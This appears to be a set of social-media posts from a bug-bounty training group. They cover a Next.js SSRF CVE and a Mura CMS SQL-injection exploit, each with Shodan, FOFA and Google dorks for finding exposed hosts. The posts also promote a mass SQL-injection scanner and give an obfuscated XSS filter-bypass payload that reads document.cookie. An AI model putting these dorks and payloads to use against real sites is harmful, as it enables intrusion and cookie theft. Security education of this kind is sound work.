🚨CVE-2024-34351: Next.js SSRF in Server Actions🚨
📢 Security researchers at Assetnote have identified an SSRF vulnerability in Next.js Server Actions. If the Host header is modified, and certain conditions are met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.
📝Dorks--->
Hunter:/product.name="Next.js"
FOFA:app="Next.js"
SHODAN:http.component:"Next.js"
🔗PoC: https://lnkd.in/gKbjiHVY
⚠Stay vigilant and take necessary precautions to protect your applications.
🚨SQLMC - SQL Injection Massive Checker🚨
📢SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
🔗Download https://github.com/malvads/sqlmc
Bypass XSS Filter with Array
Payload :
<nonoscript><p noscript="</nonoscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">
Poll: A ____ is used to connect to a remote system using NetBIOS.
Final Results:
NULL session - 46%
Hash - 13%
Rainbow table - 10%
Rootkit - 41%
Brut Security
A ____ is used to connect to a remote system using NetBIOS.
The answer is NULL session.
🚨Muraider - Automating the Detection & Exploitation of CVE-2024-32640 SQLi in Mura/Masa CMS🚨
⚠Usage- python3 CVE-2024-32640.py --url https://target.com
👉Dorks-
Shodan-query: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"
🔗Link- https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS
👉References:
https://buff.ly/3WKUzc9
https://buff.ly/3WJh1SY
📢For Live Class Enrollment DM in Whatsapp- https://buff.ly/3wOME2W
📝Join Our Telegram- https://buff.ly/3yi0H1o
📝Join Our Community- https://zurl.co/6G4I
📢 Take the 30-Day Bug Hunting Challenge!
🚨 Get ready to put your skills to the test! The challenge will be starting from June 1st.
👉 Anyone can participate in the challenge by joining our community. This is a self-help goal challenge where you will need to dedicate yourself for 30 days until you successfully find a bug and report it.
🔗 Join the Brut Security Community on Nas.io now: https://nas.io/brutsecurity
📝 For Enquiries DM us in WhatsApp: https://wa.me/918945971332